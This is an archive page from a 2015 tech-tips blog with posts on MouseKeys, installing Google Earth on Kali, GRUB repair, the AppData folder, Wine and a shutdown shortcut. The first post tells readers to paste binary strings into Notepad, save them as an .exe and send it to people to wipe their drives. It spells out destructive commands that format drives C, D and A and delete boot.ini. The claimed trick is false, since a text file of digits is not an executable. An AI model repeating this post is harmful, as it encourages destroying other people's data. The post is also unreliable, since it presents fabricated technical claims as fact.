Affichage des articles dont le libellé est how to's. Afficher tous les articles
Affichage des articles dont le libellé est how to's. Afficher tous les articles

mardi 30 juin 2015

Format HDD using Notepad


Copy & Paste the following code in Notepad.

0100101100011111001001010101010101000

0011111100000


Save As "format.exe" or any name u want (but with extension.exe)


Now you can send this .exe file to people to format their HDD


It can fail to format your HDD while running WINDOWS.



Format c:\ /Q/X -- this will format your drive c:\

011001100110111101110010011011010110000

10111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


Format d:\ /Q/X -- this will format your drive d:\

011001100110111101110010011011010110000

10111010000

100000011001000011101001011100


0010000000101111010100010010111101011000

Format a:\ /Q/X -- this will format your drive a:\

0110011001101111011100100110110101100

0010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini -- this will STOP your computer from booting.

011001000110010101101100001000000010

11110100011000 101111010100110010111101010001

001000000110001100111010010111000110

00100110111101 101111011101000010111001101001

0110111001101001

lundi 29 juin 2015

How to Use Keyboard as Mouse in Windows

Use Keyboard as Mouse In Emergency Case–

Windows OS has an Inbuilt option Called MouseKeys, Not much people are aware of it but yes now you are. You can Enable/disable and disable MouseKeys very Easily.

You can Enable it by Pressing Alt + Shift + Numlock keys. As soon as you do it, you will be prompt with the below dialog box, Just Click Yes to it.
 


 Use keyboard as mouse
Make Sure your Numlock is Off while you Use keyboard as mouse.
Done !!! Now you will see MouseKeys icon on your taskbar, which means now you are all set.
Now talking about the Controllers, Use 8,2,4 and 6 Keys from Numpad to move Up, Down, Left and Right Respectively.
Alternatively You can also use Third Party Program Called NeatMouse , This software is portable, Main advantage to use it is it gives you better Control because of additional options that it makes available. it have an option to Remap Controller keys according to your Comfort.
Probably we will have to Use Keyboard as Mouse temporarily and not for long time so one may not prefer to get third party software for this task, but many may do it as it is free and can be helpful.






dimanche 28 juin 2015

How To Install Google Earth on Kali Linux

Google earth according to wikipedia is: “… virtual globe program that was originally called Earth Viewer and was created by Keyhole, Inc. It maps the earth by the superimposition of images obtained from satellite imagery, aerial photography and GIS 3D globe. It is available under three different licenses: Google Earth, a free version with limited functionality; Google Earth Plus ($20 per year), which includes additional features; and Google Earth Pro ($400 per year), which is intended for commercial use” 



So, how could we install it on our Debian or Ubuntu system?, it is really easy now. First we need to Google Earth package, to be able to create the .deb file. Let’s start. Open Terminal root@kali:~# apt-get install lbs-core Then open browser and enter URL: http://www.google.com/earth/download/ge/agree.html Then select your download package and download it. Then open terminal and install the Google Earth: root@kali:~# dpkg -i google-earth-stable_current_i386.deb To open Google Earth, open Terminal: root@kali:~# google-earth All Done! - See more at: http://www.iexplo1t.com/2015/06/GoogleEarth.html#sthash.zQUBqyiB.dpuf

Source: http://www.iexplo1t.com/2015/06/GoogleEarth.html

So, how could we install it on our Debian or Ubuntu system?,it is really easy now.

First we need to Google Earth package,


Open Terminal:

 root@kali:~# apt-get install lbs-core 

Then open browser and enter URL: Google earth download

Then select your download package and download it. 

 Then open terminal and install the Google Earth:

 root@kali:~# dpkg -i google-earth-stable_current_i386.deb 

To open Google Earth, open Terminal:

 root@kali:~# google-earth 
Google earth according to wikipedia is: “… virtual globe program that was originally called Earth Viewer and was created by Keyhole, Inc. It maps the earth by the superimposition of images obtained from satellite imagery, aerial photography and GIS 3D globe. It is available under three different licenses: Google Earth, a free version with limited functionality; Google Earth Plus ($20 per year), which includes additional features; and Google Earth Pro ($400 per year), which is intended for commercial use” - See more at: http://www.iexplo1t.com/2015/06/GoogleEarth.html#sthash.YuIdmh4Y.dpuf

Source: http://www.iexplo1t.com/2015/06/GoogleEarth.html
Google earth according to wikipedia is: “… virtual globe program that was originally called Earth Viewer and was created by Keyhole, Inc. It maps the earth by the superimposition of images obtained from satellite imagery, aerial photography and GIS 3D globe. It is available under three different licenses: Google Earth, a free version with limited functionality; Google Earth Plus ($20 per year), which includes additional features; and Google Earth Pro ($400 per year), which is intended for commercial use” - See more at: http://www.iexplo1t.com/2015/06/GoogleEarth.html#sthash.YuIdmh4Y.dpuf

Source: http://www.iexplo1t.com/2015/06/GoogleEarth.html
Google earth according to wikipedia is: “… virtual globe program that was originally called Earth Viewer and was created by Keyhole, Inc. It maps the earth by the superimposition of images obtained from satellite imagery, aerial photography and GIS 3D globe. It is available under three different licenses: Google Earth, a free version with limited functionality; Google Earth Plus ($20 per year), which includes additional features; and Google Earth Pro ($400 per year), which is intended for commercial use” - See more at: http://www.iexplo1t.com/2015/06/GoogleEarth.html#sthash.ILLyfIaP.dpuf

Source: http://www.iexplo1t.com/2015/06/GoogleEarth.html

vendredi 26 juin 2015

How To Repair Kali Linux Grub With Kali Linux Live Cd: Dual Boot With Windows 7

This is a guide of how to repair grub in the event your windows 7 removed the grub during the installation
First thing that you'll need to do is to boot from a kali linux live cd. After that, go to gparted so that you can get to see where kali was installed: usually it's in the file system that ends with ext4, depending with the file system you used during the installation. In my case, the kali linux system was in sda3, but it varies with different systems.
From there, you'll have to use the terminal for the following commands:

Code:
mount /dev/sda3 /mnt
mount --bind /dev /mnt/dev
mount --bind /dev/pts /mnt/dev/pts
mount --bind /proc /mnt/proc
mount --bind /sys /mnt/sys
chroot /mnt
grub-install /dev/sda
update-grub
exit
umount /mnt/dev/pts
umount /mnt/dev
umount /mnt/proc
umount /mnt/sys
umount /mnt

This will restore the old kali linux boot loader, however, you will have to boot into kali once the live cd is out, so as to add windows into the boot loader. Once booted, go to the terminal and do the following:


Code:
os-prober
update-grub

jeudi 25 juin 2015

What is the AppData folder?


The AppData folder contains app settings, files, and data specific to the apps on your PC. The folder is hidden by default in File Explorer, and has three hidden sub-folders: Local, LocalLow, and Roaming.

  • Roaming. This folder (%appdata%) contains data that can move with your user profile from PC to PC—like when you’re on a domain—because this data has the ability to sync with a server. For example, if you sign in to a different PC on a domain, your web browser favorites or bookmarks will be available.
  • Local. This folder (%localappdata%) contains data that can't move with your user profile. This data is typically specific to a PC or too large to sync with a server. For example, web browsers usually store their temporary files here.
  • LocalLow. This folder (%appdata%/…/locallow) contains data that can't move, but also has a lower level of access. For example, if you're running a web browser in a protected or safe mode, the app will only be able access data from the LocalLow folder.
The apps themselves choose whether to save to the Local, LocalLow, or Roaming folders. Most desktop apps use the Roaming folder by default, while most Windows Store apps use the Local folder by default.

Warning

  • We don't recommend moving, deleting, or making any changes to files or folders in the AppData folder. Doing so could make your apps run poorly or stop working entirely. 

How to run Windows software in Linux



Linux is more capable than ever. With over 1000 Linux games available on Steam and a general shift towards more web-based desktop software,

But, as most dedicated Linux desktop users will eventually discover, there comes a time when you just need to run a particular piece of Windows software on your Linux PC.
There are quite a few ways to do so. Here’s what you need to know:
ADVERTISING

Wine

Wine is a way to run Windows software on Linux, but with no Windows required.
Wine is an open-source “Windows compatibility layer” that can run Windows programs directly on your Linux desktop. Essentially, this open-source project is attempting to re-implement enough of Windows from scratch that it can run all those Windows applications without actually needing Windows.

This is the only method here that won’t actually require a copy of Windows, but the downside is that it won’t run every application properly. You may encounter bugs or performance issues, especially if you’re using Wine to play video games. But if you’re running a popular game released a few years ago, you may find that it performs very well. Many people use Wine to play World of Warcraft on Linux, for example. You can get an idea of how an application will run and any tweaks it might require by visiting the Wine Application Database website and searching for that application.


Virtual machines

Virtual machines are a very convenient way to run Windows software on your Linux PC. As PCs have gotten faster, virtual machines have become comparatively more lightweight.

This process involves installing a copy of Windows in a “virtual machine” program like VirtualBox, VMware, or Linux’s built-in KVM (Kernel-based Virtual Machine) solution. That copy of Windows thinks it’s running on real hardware, but it’s really running in window on your desktop. Modern virtual-machine solutions can even break Windows programs running in the virtual machine out of that window, allowing them to act like normal windows on your Linux desktop.


Dual-booting

Dual-booting isn’t technically a way to run Windows software on Linux itself, but it is how many Linux users run Windows software. Rather than using it directly under Linux, you just reboot your computer, choose Windows, and boot into Microsoft’s operating system. The Windows software can then run in its native environment. Thanks to modern solid-state drives, that reboot process should be faster than ever.




mercredi 24 juin 2015

How to shutdown your computer using desktops?



If you're trying to eliminate every extraneous mouse click, you can shut down your computer with


an icon on the desktop. Right-


click on your desktop, click
"New," and then click "Shortcut."
In the "Type the location of the
item" field, type "shutdown -s -t
00" to give you a way to shut
down the computer immediately.
(Change the -s to -r to create a
reboot shortcut instead.)


                                                      Thanks.

 

©2015 DT TECH. All rights resevered.Designed by Oussama

Back To Top